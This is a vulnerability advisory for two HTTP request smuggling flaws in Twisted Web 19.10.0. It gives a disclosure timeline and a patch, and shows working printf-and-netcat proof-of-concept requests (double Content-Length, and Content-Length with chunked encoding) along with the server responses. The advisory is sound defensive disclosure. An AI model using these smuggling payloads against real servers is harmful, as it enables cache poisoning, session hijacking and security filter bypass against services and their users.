ADVISORY SUMMARY

The following document describes identified vulnerabilities in the Twisted application version 19.10.0.

Impact

Request smuggling vulnerabilities are often high-risk and can lead to a variety of outcomes, including cache poisoning, session hijacking via socket poisoning, and security filter bypasses. By exploiting inconsistencies in HTTP message parsing, attackers can smuggle complete or partial secondary HTTP messages to a remote server to attack backend services or other users.

In this case, risk is highly contextual, it depends where and why Twisted is deployed in a given environment. The impact will vary depending on the business purpose of the service designed with Twisted.

For more information on the impact of HTTP request splitting vulnerabilities, please refer to the following:

• https://portswigger.net/web-security/request-smuggling
• https://portswigger.net/research/http-desync-attacks-request-smuggling-reborn

Risk Level

High

Affected Vendor

Product Description

Twisted is an event-driven networking engine written in Python. The project’s official website is https://twistedmatrix.com/. The latest version of the application is 20.3.0rc1, released on March 9, 2020.

Vulnerabilities List:

One vulnerability was identified within the Twisted application:

Solution

Update to version 20.3.0rc1.

Credits

Timeline

1. Initial Discovery: 12/05/2019
2. Contact with vendor: 12/09/2019
3. Vendor acknowledged vulnerabilities: 12/09/2019
4. Touch-base regarding disclosure; vendor optimistic of 3/9 patch deadline: 02/24/2020
5. Following up on patch status: 03/03/2020
6. Shared assigned CVE IDs with Twisted team: 03/04/2020
7. Coordinated full-disclosure/release timeline: 3/06/2020
8. Vendor released patched version 20.3.0rc1: 3/09/2020
9. Vulnerabilities publicly disclosed: 03/11/2020

This vulnerability is described in the following sections.

VULNERABILITY

HTTP REQUEST SPLITTING 

Two HTTP request splitting (AKA HTTP request smuggling) vulnerabilities were identified in the latest version of Twisted Web. Both issues arose from deviations from RFC 7230 (HTTP/1.1: Message Syntax and Routing). Request smuggling vulnerabilities are often high-risk and can lead to a variety of outcomes, including cache poisoning, session hijacking via socket poisoning, and security filter bypasses.

To demonstrate the vulnerabilities, printf and netcat command examples are provided to construct raw HTTP messages as the client. For the server, I started Twisted Web 19.10.0 using twistd web --path . --port tcp:<port> (Twisted Framework Python apps that use twistd.web are also affected).

Instance #1

Double Content-Length Headers

When presented with two content-length headers, Twisted Web ignored the first header. When the second content-length was set to zero, it caused Twisted Web to interpret the request body as a pipelined request.

According to RFC 7230 Section 3.3.3#4, if a message is received with multiple content-length headers with differing value, then the server must reject the message with a 400 response.

Request

printf 'GET /doesnotexist HTTP/1.1\r\n'\
'Content-Length: 56\r\n'\
'Content-Length: 0\r\n'\
'Host: test.example.com\r\n'\
'\r\n'\
'GET /?opfdii=k58inf HTTP/1.1\r\n'\
'Host: test.example.com\r\n'\
'\r\n' | nc 127.0.0.1 <port>

Response

HTTP/1.1 404 Not Found
Server: TwistedWeb/19.10.0
Date: Mon, 09 Dec 2019 17:02:45 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 145


<html>
  <head><title>404 - No Such Resource</title></head>
  <body>
    <h1>No Such Resource</h1>
    <p>File not found.</p>
  </body>
</html>
HTTP/1.1 200 OK
Server: TwistedWeb/19.10.0
Date: Mon, 09 Dec 2019 17:02:45 GMT
Accept-Ranges: bytes
Content-Length: 6
Content-Type: text/html
Last-Modified: Tue, 26 Nov 2019 23:21:03 GMT

Hello

As shown above, both the /doesnotexist and the smuggled request to the base path [/] were successfully resolved.

Instance #2

Differing Content-Length/Chunked Encoding

When presented with a content-length and a chunked encoding header, the content-length took precedence and the remainder of the request body was interpreted by Twisted Web as a pipelined request.

According to RFC 7230 Section 3.3.3#3, if a message with both content-length and chunked encoding is accepted, transfer-encoding overrides the content-length.

Request

printf 'GET /?nkomd7=8h7pjm HTTP/1.1\r\n'\
'Transfer-Encoding: chunked\r\n'\
'Content-Length: 4\r\n'\
'Content-Type: application/x-www-form-urlencoded\r\n'\
'Host: test.example.com\r\n'\
'\r\n'\
'33\r\n'\
'GET /?ab8c4i=deg3if HTTP/1.1\r\n'\
'Content-Length: 5\r\n'\
'Host: test.example.com\r\n'\
'\r\n'\
'\r\n'\
'0\r\n'\
'\r\n' | nc 127.0.0.1 <port>

Response

HTTP/1.1 200 OK
Server: TwistedWeb/19.10.0
Date: Mon, 09 Dec 2019 17:04:19 GMT
Accept-Ranges: bytes
Content-Length: 6
Content-Type: text/html
Last-Modified: Tue, 26 Nov 2019 23:21:03 GMT

Hello
HTTP/1.1 200 OK
Server: TwistedWeb/19.10.0
Date: Mon, 09 Dec 2019 17:04:19 GMT
Accept-Ranges: bytes
Content-Length: 6
Content-Type: text/html
Last-Modified: Tue, 26 Nov 2019 23:21:03 GMT

Hello

As shown above, smuggled requests were interpreted by the Twisted server. The impact of these vulnerabilities can vary depending on the surrounding infrastructure and the purpose of the service implemented with Twisted.